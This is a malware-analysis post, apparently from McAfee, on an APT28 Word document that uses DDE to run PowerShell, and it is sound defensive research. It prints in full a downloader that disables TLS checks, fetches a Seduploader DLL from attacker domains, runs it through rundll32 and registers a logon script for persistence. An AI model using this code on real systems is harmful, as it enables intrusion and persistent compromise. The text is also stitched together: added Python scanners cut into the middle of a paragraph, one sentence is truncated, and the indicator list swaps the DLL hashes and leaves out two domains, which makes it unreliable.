# Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack

**[By Ryan Sherstobitoff and Michael Rea on Nov 07, 2017](https://securingtomorrow.mcafee.com/author/ryan-sherstobitoff/)**

During our monitoring of activities around the APT28 threat group, McAfee Advanced Threat Research analysts identified a malicious Word document that appears to leverage the Microsoft Office Dynamic Data Exchange (DDE) technique that has been previously reported by Advanced Threat Research. This document likely marks the first observed use of this technique by APT28. The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim's system regardless of whether macros are enabled. (McAfee product detection is covered in the Indicators of Compromise section at the end of the document.)

APT28 has recently focused on using different themes. In this case it capitalized on the recent terrorist attack in New York City. The document itself is blank. Once opened, the document contacts a control server to drop the first stage of the malware, Seduploader, onto a victim's system.

The domain involved in the distribution of Seduploader was created on October 19, 11 days prior to the creation of Seduploader.

The document we examined for this post:

- Filename: IsisAttackInNewYork.docx
- Sha1: 1c6c700ceebfbe799e115582665105caa03c5c9e
- Creation date: 2017-10-27T22:23:00Z

The document uses the recently detailed DDE technique found in Office products to invoke the command prompt, which in turn invokes PowerShell, which runs two commands. The first:

```
C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object
#.EXE
```

(The portion of the first command between `New-Object` and the trailing `#.EXE` is not preserved in this copy of the post.)

The second PowerShell command is Base64 encoded and is found in the version of config.txt received from the remote server.
It decodes as follows:

```powershell
$W=New-Object System.Net.WebClient;
$p=($Env:ALLUSERSPROFILE+"\vms.dll");
# Disable TLS certificate validation for the download
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$W.DownloadFile("hxxp://netmediaresources[.]com/media/resource/vms.dll ",$p);
if (Test-Path $p){
# Launch the downloaded DLL through rundll32, export ordinal 1
$rd_p=$Env:SYSTEMROOT+"\System32\rundll32.exe";
$p_a=$p+",#1";
$pr=Start-Process $rd_p -ArgumentList $p_a;
# Write a batch file that relaunches the DLL and register it as a logon script
$p_bat=($Env:ALLUSERSPROFILE+"\vms.bat");
$text='set inst_pck = "%ALLUSERSPROFILE%\vms.dll"'+"`r`n"+'if NOT exist %inst_pck % (exit)'+"`r`n"+'start rundll32.exe %inst_pck %,#1'
[io.File]::WriteAllText($p_bat,$text)
New-Item -Path 'HKCU:\Environment' -Force | Out-Null;
New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;
}
```

The PowerShell scripts contact the following URL to download Seduploader: hxxp://netmediaresources[.]com/media/resource/vms.dll

The Seduploader sample has the following artifacts:

- Filename: vms.dll
- Sha1: 4bc722a9b0492a50bd86a1341f02c74c0d773db7
- Compile date: 2017-10-31 20:11:10
- Control server: webviewres[.]net

The document downloads a version of the Seduploader first-stage reconnaissance implant, which profiles prospective victims, sending basic host information from the infected system to the attackers. If the system is of interest, then the installation of X-Agent or Sedreco usually follows.

We have observed APT28 using Seduploader as a first-stage payload for several years, as documented in various public reporting. Based on structural code analysis of recent payloads observed in the campaign, we see they are identical to previous Seduploader samples employed by APT28.

We identified the control server domain associated with this activity as webviewres[.]net, which is consistent with past APT28 domain registration techniques that spoof legitimate-sounding infrastructure.
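A document that carries this technique can be triaged offline by inspecting its field codes. The following is an added example, not code from the McAfee post: a Python scanner that unpacks a .docx, collects every field instruction from word/document.xml, and flags DDE/DDEAUTO fields, references to PowerShell, and the `\..\` traversal the document uses to reach powershell.exe from the Office directory. The `build_sample_docx` helper and the sample field code are constructed for illustration, and the pattern names are this example's own.

```python
import html
import io
import re
import zipfile
from xml.etree import ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
# Field-code patterns to flag; the traversal check mirrors the MSWord.exe\..\..\ trick.
SUSPICIOUS = {
    "dde_field": re.compile(r"\bDDE(AUTO)?\b", re.I),
    "powershell": re.compile(r"powershell", re.I),
    "path_traversal": re.compile(r"\\\.\.\\"),
}

def extract_field_codes(docx_bytes):
    """Return every field instruction found in word/document.xml."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    fields, current = [], None
    for el in root.iter():  # document order
        if el.tag == W + "fldSimple":  # simple field: instruction in w:instr
            fields.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":  # complex field: begin / separate / end
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                current = []
            elif kind in ("separate", "end") and current is not None:
                fields.append("".join(current))  # after separate only result text follows
                current = None
        elif el.tag == W + "instrText" and current is not None:
            current.append(el.text or "")
    return fields

def scan_docx(docx_bytes):
    """Map each suspicious pattern name to the field codes that match it."""
    hits = {}
    for code in extract_field_codes(docx_bytes):
        for name, rx in SUSPICIOUS.items():
            if rx.search(code):
                hits.setdefault(name, []).append(code.strip())
    return hits

def build_sample_docx(field_code):  # constructed test input: one complex field
    xml = (f'<w:document xmlns:w="{W[1:-1]}"><w:body><w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
           f'<w:r><w:instrText>{html.escape(field_code)}</w:instrText></w:r><w:r><w:fldChar w:fldCharType="separate"/></w:r>'
           '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", xml)
    return buf.getvalue()
```

Headers, footers and footnotes live in other parts of the archive (word/header1.xml and so on), so a production scanner should apply `extract_field_codes` to every XML part rather than only document.xml.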
This domain was registered on October 25, a few days before the payload and malicious documents were created. The domain was first active on October 29, just days before this version of Seduploader was compiled. The domain currently resolves to 185.216.35.26 and is hosted on the name servers ns1.njal.la and ns2.njal.la.

Further McAfee research identified the following related sample:

- Filename: secnt.dll
- Compile date: 2017-10-30 23:53:02
- Control server: satellitedeluxpanorama[.]com (This domain uses the same name servers as above.)

The preceding sample most likely belongs to the same campaign. Based on our analysis it uses the same techniques and payload. We can clearly establish that the campaign involving documents using DDE techniques began on October 25.

The domain satellitedeluxpanorama[.]com, used by the implant secnt.dll, resolved to 89.34.111.160 as of November 5. The malicious document 68c2809560c7623d2307d8797691abf3eafe319a is responsible for dropping the Seduploader payload (secnt.dll). Its original file name was SaberGuardian2017.docx. This document was created on October 27. The document is distributed from hxxp://sendmevideo[.]org/SaberGuardian2017.docx.
The document calls sendmevideo[.]org/dh2025e/eh.dll to download Seduploader (ab354807e687993fbeb1b325eb6e4ab38d428a1e).

The PowerShell command embedded in this document:

```powershell
$W=New-Object System.Net.WebClient;
$p=($Env:ALLUSERSPROFILE+"\mvdrt.dll");
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$W.DownloadFile("hxxp://sendmevideo[.]org/dh2025e/eh.dll",$p);
if (Test-Path $p){
$rd_p=$Env:SYSTEMROOT+"\System32\rundll32.exe";
$p_a=$p+",#1";
$pr=Start-Process $rd_p -ArgumentList $p_a;
$p_bat=($Env:ALLUSERSPROFILE+"\mvdrt.bat");
$text='set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"'+"`r`n"+'if NOT exist %inst_pck % (exit)'+"`r`n"+'start rundll32.exe %inst_pck %,#1'
[io.File]::WriteAllText($p_bat,$text)
New-Item -Path 'HKCU:\Environment' -Force | Out-Null;
New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;
}
```

The file vms.dll, 4bc722a9b0492a50bd86a1341f02c74c0d773db7, is 99% similar to secnt.dll, ab354807e687993fbeb1b325eb6e4ab38d428a1e, indicating the code is almost identical and that the two DLL implants are highly likely to be part of the same campaign. Furthermore, the sample … [conference Cy Con U.S.](http://aci.cvent.com/events/2017-international-conference-on-cyber-conflict-cycon-u-s-/event-summary-004d598d31684f21ac82050a9000369f.aspx)

The attack techniques in the two campaigns differ: the campaign spoofing the Cy Con U.S. conference used document files to execute a malicious VBA script; this campaign using the terrorist theme uses DDE within a document file to execute PowerShell and fetches a remote payload from a distribution site.
The payloads, however, are identical for both campaigns.

### Conclusion

APT28 is a resourceful threat actor that not only capitalizes on recent events to trick potential victims into infections, but can also rapidly incorporate new exploitation techniques to increase its success. Given the publicity the Cy Con U.S. campaign received in the press, it is possible APT28 actors moved away from using the VBA script employed in past actions and chose to incorporate the DDE technique to bypass network defenses. Finally, the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlights APT28's ability and interest in exploiting geopolitical events for its operations.

### Indicators of Compromise

**SHA1 hashes**

- ab354807e687993fbeb1b325eb6e4ab38d428a1e (vms.dll, Seduploader implant)
- 4bc722a9b0492a50bd86a1341f02c74c0d773db7 (secnt.dll, Seduploader implant)
- 1c6c700ceebfbe799e115582665105caa03c5c9e (IsisAttackInNewYork.docx)
- 68c2809560c7623d2307d8797691abf3eafe319a (SaberGuardian.docx)

**Domains**

- webviewres[.]net
- netmediaresources[.]com

**IPs**

- 185.216.35.26
- 89.34.111.160

**McAfee coverage**

McAfee products detect this threat as RDN/Generic Downloader.x.
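The Base64-encoded second-stage command described above can be decoded and triaged without executing it. The following is an added example, not code from the McAfee post: a Python script that decodes a PowerShell `-EncodedCommand` value (Base64 over UTF-16LE text) and reports which downloader behaviours the decoded script contains, namely the download URL, the dropped DLL path, the rundll32 ordinal export, the disabled TLS certificate validation, and the `UserInitMprLogonScript` logon-script persistence. The sample script is constructed from the essential lines of the decoded command above with the URL defanged, and the finding names are this example's own.

```python
import base64
import re

# Regexes keyed by finding name (constructed for this triage example; each one
# mirrors a construct in the decoded Seduploader downloader shown above).
INDICATORS = {
    "download_url": re.compile(r'DownloadFile\(\s*"([^"]+?)\s*"', re.I),
    "drop_path": re.compile(r'\$Env:ALLUSERSPROFILE\+\s*"([^"]+)"', re.I),
    "rundll32_export": re.compile(r"rundll32\.exe[^\n]*?,#(\d+)", re.I),
    "tls_validation_disabled": re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "logon_script_persistence": re.compile(r"HKCU:\\Environment'?\s+-Name\s+'?UserInitMprLogonScript", re.I),
}

def decode_encoded_command(b64):
    """Decode a PowerShell -EncodedCommand value: Base64 over UTF-16LE text."""
    return base64.b64decode(b64).decode("utf-16-le")

def encode_command(script):
    """Inverse of decode_encoded_command; used here only to build test input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def triage(b64):
    """Decode the command and report which downloader behaviours it contains."""
    script = decode_encoded_command(b64)
    findings = {}
    for name, rx in INDICATORS.items():
        m = rx.search(script)
        if m:
            findings[name] = m.group(1) if m.groups() else True
    return findings

# Constructed sample: the essential lines of the decoded script from the post,
# with the download URL defanged. Not an actual captured command.
SAMPLE_SCRIPT = r"""$W=New-Object System.Net.WebClient;
$p=($Env:ALLUSERSPROFILE+"\vms.dll");
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$W.DownloadFile("hxxp://netmediaresources[.]com/media/resource/vms.dll ",$p);
if (Test-Path $p){
$p_bat=($Env:ALLUSERSPROFILE+"\vms.bat");
$text='start rundll32.exe "%ALLUSERSPROFILE%\vms.dll",#1'
[io.File]::WriteAllText($p_bat,$text)
New-ItemProperty -Path 'HKCU:\Environment' -Name 'UserInitMprLogonScript' -Value "$p_bat" -PropertyType String -Force | Out-Null;
}"""

if __name__ == "__main__":
    for name, value in triage(encode_command(SAMPLE_SCRIPT)).items():
        print(f"{name}: {value}")
```

On a live host the same persistence can be checked by reading the UserInitMprLogonScript value under HKCU\Environment, which legitimate software rarely sets.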